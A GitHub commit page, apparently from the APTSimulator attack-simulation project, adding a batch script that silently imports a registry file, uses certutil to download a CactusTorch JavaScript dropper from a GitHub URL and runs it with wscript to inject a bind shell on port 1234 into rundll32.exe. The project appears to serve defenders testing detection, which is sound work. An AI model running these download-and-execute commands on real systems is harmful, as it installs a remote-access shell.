-
Notifications
You must be signed in to change notification settings - Fork 431
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Florian Roth
committed
Feb 15, 2018
1 parent
2f2996d
commit 7b8d929
Showing
2 changed files
with
17 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
@ECHO OFF | ||
|
||
ECHO =========================================================================== | ||
ECHO CACTUSTORCH | ||
ECHO. | ||
ECHO Using certutil to drop a CactusTorch shellcode lanucher injecting bind shell (port 1234/tcp) into rundll32.exe | ||
ping -n 5 127.0.0.1 > NUL | ||
|
||
ECHO Fixing possible problems with JavaScript on the system | ||
"%ZIP%" e -p%PASS% %FILEARCH% -aoa -o"%TEMP%" workfiles\jsfix.reg > NUL | ||
regedit.exe /s %TEMP%\jsfix.reg | ||
|
||
ECHO Downloading the CactusTorch dropper | ||
cmd.exe /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/NextronSystems/APTSimulator/master/download/cactus.js C:\Users\Public\en-US.js | ||
|
||
ECHO Executing the CactusTorch dropper | ||
wscript.exe C:\Users\Public\en-US.js |
Binary file not shown.